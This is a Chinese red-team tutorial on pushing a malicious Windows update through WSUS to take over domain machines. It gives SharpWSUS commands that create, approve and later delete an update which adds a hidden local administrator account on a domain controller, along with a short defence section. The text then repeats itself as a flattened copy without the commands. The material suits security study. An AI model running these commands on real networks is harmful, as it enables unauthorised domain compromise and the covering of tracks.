WSUS利用
字数 1247 2025-08-06 20:12:44

WSUS利用教学文档

1. WSUS概述

WSUS (Windows Server Update Services) 是微软提供的系统补丁更新解决方案,主要用于大型域环境。

关键特性

  • 允许域内机器在不直接连接互联网的情况下通过WSUS Server获取更新
  • 使用HTTP(8530端口)和HTTPS(8531端口)与Microsoft通信
  • 常见部署模式:
    • 单域单WSUS服务器
    • 多WSUS服务器架构

2. 攻击原理

利用WSUS服务器推送恶意补丁进行横向渗透,主要针对域内通过WSUS更新的客户端。

3. 攻击前提条件

  1. 已获取域内一台机器的权限(如示例中的win7机器dm2007)
  2. 域内存在WSUS服务器(如示例中的WSUS-1)
  3. 目标机器(如域控DC2)配置为从该WSUS服务器获取更新

4. 攻击步骤详解

4.1 信息收集

定位WSUS服务器方法:

  1. 注册表查询

    HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate

  2. 使用SharpWSUS工具

    SharpWSUS.exe locate

4.2 枚举WSUS服务信息

获取WSUS服务器管理的客户端信息:

SharpWSUS.exe inspect

可获取:

  • 管理的计算机列表
  • IP地址
  • 版本信息
  • 上一次更新时间

4.3 创建恶意补丁

关键要点

  • 有效负载必须是Microsoft签名的二进制文件
  • 常用工具:PsExec.exe
  • 文件必须存储在磁盘上,WSUS Server能访问的位置

示例命令

SharpWSUS.exe create /payload:"C:\Users\public\psexec.exe" /args:"-accepteula -s -d cmd.exe /c 'net user lzz Qq123456.. /add && net localgroup administrators lzz /add'" /title:"demo01"

说明

  • 补丁中的二进制文件会被保存为wuagent.exe
  • updateid是补丁的唯一标识符

4.4 批准补丁并分组

  1. 创建组并将目标机器加入:

    SharpWSUS.exe approve /updateid:ac82689b-f451-4df5-bc1c-3cb653301252 /computername:dc2.redteam.lab /groupname:"Demos"

  2. 验证组创建:

    SharpWSUS.exe inspect

4.5 等待补丁应用

重要限制

  • 无法控制客户端何时拉取补丁
  • 更新时间由域内WSUS组策略设置(如示例中设置为每天3点)

4.6 清理痕迹

删除恶意补丁:

SharpWSUS.exe delete /updateid:ac82689b-f451-4df5-bc1c-3cb653301252 /computername:dc2.redteam.lab /groupname:"Demos"

5. 攻击成功标志

目标机器安装更新后,恶意补丁执行成功(如示例中在DC2上创建了本地管理员账户lzz)。

6. 防御措施

  1. 溯源线索

    • wuagent.exe不会被自动删除
    • 检查WSUS服务器上的异常二进制文件

  2. 监控措施

    • 监控WSUS组的创建和删除操作
    • 审计WSUS服务器上的补丁审批记录

  3. 其他防御

    • 限制WSUS服务器的管理权限
    • 实施WSUS服务器的访问控制
    • 定期审计WSUS配置和补丁

7. 工具说明

SharpWSUS - 用于WSUS攻击的主要工具,功能包括:

  • 定位WSUS服务器
  • 检查WSUS配置和客户端
  • 创建和审批恶意补丁
  • 删除补丁和清理痕迹

8. 注意事项

  1. 攻击成功依赖于客户端实际安装恶意补丁
  2. 补丁执行时机不可控,取决于客户端配置的更新时间
  3. 必须使用微软签名的二进制文件作为payload
  4. 攻击后会留下痕迹(wuagent.exe等)

9. 扩展攻击方式

除了使用PsExec.exe,还可以:

  • 使用RunDLL32在网络共享上运行恶意DLL
  • 其他微软签名的可被利用的二进制文件

10. 参考架构图

文中提到的两种WSUS架构:

  1. 单域单WSUS服务器架构
  2. 域内多WSUS服务器架构

(注:实际教学中应配合架构图进行讲解)

WSUS利用教学文档 1. WSUS概述 WSUS (Windows Server Update Services) 是微软提供的系统补丁更新解决方案,主要用于大型域环境。 关键特性 允许域内机器在不直接连接互联网的情况下通过WSUS Server获取更新 使用HTTP(8530端口)和HTTPS(8531端口)与Microsoft通信 常见部署模式: 单域单WSUS服务器 多WSUS服务器架构 2. 攻击原理 利用WSUS服务器推送恶意补丁进行横向渗透,主要针对域内通过WSUS更新的客户端。 3. 攻击前提条件 已获取域内一台机器的权限(如示例中的win7机器dm2007) 域内存在WSUS服务器(如示例中的WSUS-1) 目标机器(如域控DC2)配置为从该WSUS服务器获取更新 4. 攻击步骤详解 4.1 信息收集 定位WSUS服务器方法: 注册表查询 : 使用SharpWSUS工具 : 4.2 枚举WSUS服务信息 获取WSUS服务器管理的客户端信息: 可获取: 管理的计算机列表 IP地址 版本信息 上一次更新时间 4.3 创建恶意补丁 关键要点 : 有效负载必须是Microsoft签名的二进制文件 常用工具:PsExec.exe 文件必须存储在磁盘上,WSUS Server能访问的位置 示例命令 : 说明 : 补丁中的二进制文件会被保存为wuagent.exe updateid是补丁的唯一标识符 4.4 批准补丁并分组 创建组并将目标机器加入: 验证组创建: 4.5 等待补丁应用 重要限制 : 无法控制客户端何时拉取补丁 更新时间由域内WSUS组策略设置(如示例中设置为每天3点) 4.6 清理痕迹 删除恶意补丁: 5. 攻击成功标志 目标机器安装更新后,恶意补丁执行成功(如示例中在DC2上创建了本地管理员账户lzz)。 6. 防御措施 溯源线索 : wuagent.exe不会被自动删除 检查WSUS服务器上的异常二进制文件 监控措施 : 监控WSUS组的创建和删除操作 审计WSUS服务器上的补丁审批记录 其他防御 : 限制WSUS服务器的管理权限 实施WSUS服务器的访问控制 定期审计WSUS配置和补丁 7. 工具说明 SharpWSUS - 用于WSUS攻击的主要工具,功能包括: 定位WSUS服务器 检查WSUS配置和客户端 创建和审批恶意补丁 删除补丁和清理痕迹 8. 注意事项 攻击成功依赖于客户端实际安装恶意补丁 补丁执行时机不可控,取决于客户端配置的更新时间 必须使用微软签名的二进制文件作为payload 攻击后会留下痕迹(wuagent.exe等) 9. 扩展攻击方式 除了使用PsExec.exe,还可以: 使用RunDLL32在网络共享上运行恶意DLL 其他微软签名的可被利用的二进制文件 10. 参考架构图 文中提到的两种WSUS架构: 单域单WSUS服务器架构 域内多WSUS服务器架构 (注:实际教学中应配合架构图进行讲解)